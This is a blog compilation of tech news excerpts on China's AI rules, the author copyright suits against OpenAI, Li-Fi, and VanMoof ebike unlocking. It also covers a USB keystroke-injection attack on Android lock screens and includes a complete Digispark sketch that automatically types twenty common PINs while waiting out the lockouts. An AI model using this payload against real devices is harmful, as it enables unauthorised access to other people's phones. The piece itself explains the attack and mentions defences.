China sets AI rules – not just risk-based (like the EU AI Act), but also ideological

Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.

Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.

Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.

But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for the promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve utilization rates.

Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”

Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.

AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”

As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.

Operators are also required to secure licenses for their AIs under most circumstances.

AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.

Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.

The new rules come into force on August 15. Chinese orgs tempted to cut corners or flout the rules have the very recent example of Beijing’s massive fines on Ant Group and Tencent as a reminder that straying will bring pain – and possibly years of punishment.

Source: China sets AI rules that protect IP, people, and The Party • The Register

A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright

You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.

All three cases were filed by Joseph Saveri, a plaintiffs’ class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers rather than stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. They rest on a ton of assumptions about how Saveri seems to think copyright law works, assumptions that are entirely inconsistent with how it actually works.

The complaints are basically all the same, and what they come down to is the argument that AI systems were trained on copyright-covered material (duh) and that this somehow violates the authors’ copyrights.

Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation

But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.

Under this definition, all search engines would be copyright infringing, because they’re effectively doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so too would be scanning internet content to train an LLM. Arguably the latter is way more transformative.

And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.

But, if you look at the details of these lawsuits, they’re not alleging any actual copying (which, you know, is kind of important for there to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.

For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.

The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.

For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.

BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.

If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.

And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:

As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka Bok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most sources of trainable books most similar in nature and size to OpenAI’s description of Books2.

Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.

This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.

Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.

I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since fee awards are much more common in copyright cases).

That said, if we’ve learned anything at all in the past two-plus decades of lawsuits about copyright and the internet, it’s that courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it actually says. If that happens here, however, it would be a huge loss to human creativity.

Source: A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright | Techdirt

Brute Forcing A Mobile’s PIN Over USB With A $3 Board

Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.

The project is based on research analyzing the security of 4- and 6-digit smartphone PINs, which found striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.

The hardware is not much more than a Digispark board, a small ATtiny85-based board with a built-in USB connector, plus an adapter. In fact, it has a lot in common with the DIY Rubber Ducky, except that it is focused on doing a single job.

Once connected to a mobile device, it performs a keystroke injection attack, automatically sending keyboard events to enter the most common PINs, with a delay between attempts. Assuming the device accepts USB keyboard input, trying all twenty codes takes about six minutes.
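
For a sense of what such a payload looks like, here is a minimal sketch in the spirit of the PoC, built in the Arduino IDE against the DigiKeyboard library that ships with the Digispark board support package. The PIN list and the delay values are illustrative assumptions, not [Mobile Hacker]’s actual payload; what stretches the run to several minutes is Android’s lockout of roughly 30 seconds after every five failed attempts.

```cpp
// Proof-of-concept sketch for a Digispark (ATtiny85) posing as a USB keyboard.
// Hypothetical reconstruction of the attack described above; the actual
// payload may differ. Requires DigiKeyboard.h from the Digispark board package.
#include "DigiKeyboard.h"

// Twenty commonly chosen 4-digit PINs (an illustrative list, not the exact
// one from the cited research).
const char* const PINS[] = {
  "1234", "1111", "0000", "1212", "7777", "1004", "2000", "4444", "2222", "6969",
  "9999", "3333", "5555", "6666", "1122", "1313", "8888", "4321", "2001", "1010"
};
const uint8_t NUM_PINS = sizeof(PINS) / sizeof(PINS[0]);

void setup() {
  DigiKeyboard.sendKeyStroke(0);  // sync keyboard state with the host first
  for (uint8_t i = 0; i < NUM_PINS; i++) {
    DigiKeyboard.print(PINS[i]);            // type the candidate PIN
    DigiKeyboard.sendKeyStroke(KEY_ENTER);  // submit it
    // Android typically locks input for ~30 s after every 5 failed attempts,
    // so wait out the lockout rather than hammering the lock screen. These
    // delay values are guesses; tune them for the target's lockout policy.
    DigiKeyboard.delay(((i + 1) % 5 == 0) ? 31000UL : 2000UL);
  }
}

void loop() {}  // one pass per plug-in; nothing to do afterwards
```

The sketch runs once as soon as the board is plugged in, which is the whole point: no interaction, no tooling, just a $3 board and an OTG adapter.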

Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video embedded in the source article.

Source: Brute Forcing A Mobile’s PIN Over USB With A $3 Board | Hackaday

100x Faster Than Wi-Fi: Light-Based Networking Standard Released

Today, the Institute of Electrical and Electronics Engineers (IEEE) added 802.11bb as a standard for light-based wireless communications. The publishing of the standard has been welcomed by global Li-Fi businesses, as it will help speed the rollout and adoption of the data-transmission technology.

Advantages of using light rather than radio frequencies (RF) are highlighted by Li-Fi proponents, including pureLiFi, Fraunhofer HHI, and the Light Communications 802.11bb Task Group. Li-Fi is said to deliver “faster, more reliable wireless communications with unparalleled security compared to conventional technologies such as Wi-Fi and 5G.” Now that the IEEE 802.11bb Li-Fi standard has been released, it is hoped that interoperability between Li-Fi systems and the hugely successful Wi-Fi will be fully addressed.

[…]

Where Li-Fi shines (pun intended) is not just in its purported speeds of up to 224 Gb/s. Fraunhofer’s Dominic Schulz points out that because it works in an exclusive optical spectrum, it ensures higher reliability and lower latency and jitter. Moreover, “Light’s line-of-sight propagation enhances security by preventing wall penetration, reducing jamming and eavesdropping risks, and enabling centimetre-precision indoor navigation,” says Schulz.

[…]

One of the big wheels of Li-Fi, pureLiFi, has already prepared the Light Antenna ONE module for integration into connected devices.

[…]

Source: 100x Faster Than Wi-Fi: Light-Based Networking Standard Released | Tom’s Hardware

VanMoof ebikes could be bricked if servers go down – fortunately security is so bad a rival has an app to let you unlock them

[…] an app is required to use many of the smart features of its bikes – and that app relies on communication with VanMoof servers. If the company goes under, and the servers go offline, that could leave ebike owners unable to even unlock their bikes.

[…]

While unlocking is activated by Bluetooth when your phone comes into range of the bike, it relies on a rolling key code – and that function in turn relies on access to a VanMoof server. If the company goes bust, then no server, no key code generation, no unlock.
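
VanMoof hasn’t published how its rolling codes work, so as a purely illustrative aside, here is a minimal sketch of how counter-based rolling codes work in general, assuming an HOTP-style construction (RFC 4226, here with SHA-256 rather than HOTP’s SHA-1). The secret, counter width, and 6-digit truncation are all assumptions, not VanMoof’s scheme; the point is that nothing about generating the next code inherently needs a server once the shared secret is on the phone.

```cpp
// Minimal sketch of counter-based rolling codes, loosely following HOTP
// (RFC 4226). NOT VanMoof's actual protocol; everything here is generic.
// Build with: g++ rolling.cpp -lcrypto
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <cstdint>
#include <cstdio>

// Both the phone and the bike hold the same secret and track the same
// counter, so either side can compute the next code with no server involved.
uint32_t rolling_code(const uint8_t* secret, int secret_len, uint64_t counter) {
  uint8_t msg[8];
  for (int i = 7; i >= 0; --i) {  // big-endian counter, as HOTP specifies
    msg[i] = counter & 0xff;
    counter >>= 8;
  }
  uint8_t mac[EVP_MAX_MD_SIZE];
  unsigned int mac_len = 0;
  HMAC(EVP_sha256(), secret, secret_len, msg, sizeof(msg), mac, &mac_len);
  // Dynamic truncation (RFC 4226 section 5.3): take 4 bytes at an offset
  // derived from the low nibble of the last MAC byte, masking the sign bit.
  uint32_t offset = mac[mac_len - 1] & 0x0f;
  uint32_t bin = ((mac[offset] & 0x7f) << 24) | (mac[offset + 1] << 16) |
                 (mac[offset + 2] << 8) | mac[offset + 3];
  return bin % 1000000;  // reduce to a 6-digit code
}

int main() {
  const uint8_t secret[] = "example-shared-secret";  // hypothetical key, fetched once
  for (uint64_t c = 0; c < 3; ++c)
    printf("counter %llu -> code %06u\n", (unsigned long long)c,
           rolling_code(secret, sizeof(secret) - 1, c));
}
```

Once the phone holds the secret, the server is only needed to hand it over in the first place – which is exactly the window the workaround below exploits.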

Rival ebike company Cowboy has a solution

A rival ebike company, Belgium’s Cowboy, has stepped in to offer a solution. TNW reports that it has created an app, Bikey, which allows VanMoof owners to generate and save their own digital key, which can be used in place of one created by a VanMoof server.

If you have a VanMoof bike, grab the app now, as it requires an initial connection to the VanMoof server to fetch your current keycode. If the server goes offline, existing Bikey App users can continue to unlock their bikes, but it will no longer be possible for new users to activate it.

[…]

In some cases, a companion app may work perfectly well in standalone mode, but it’s surprising how often a server connection is required to access the full feature set.

[…]

Perhaps we need standards here – for example, requiring all functionality (bar firmware updates) to work without access to an external server.

Where this isn’t technically possible, perhaps there should be a legal requirement for essential software to be automatically open-sourced in the event of bankruptcy, so that there would be the option of techier owners banding together to host and maintain the server-side code?

[…]

Source: VanMoof ebike mess highlights a risk with pricey smart hardware

Yup, there are too many examples of good hardware being turned into junk because the OEM goes bankrupt or just decides to stop supporting it. Something needs to be done about this.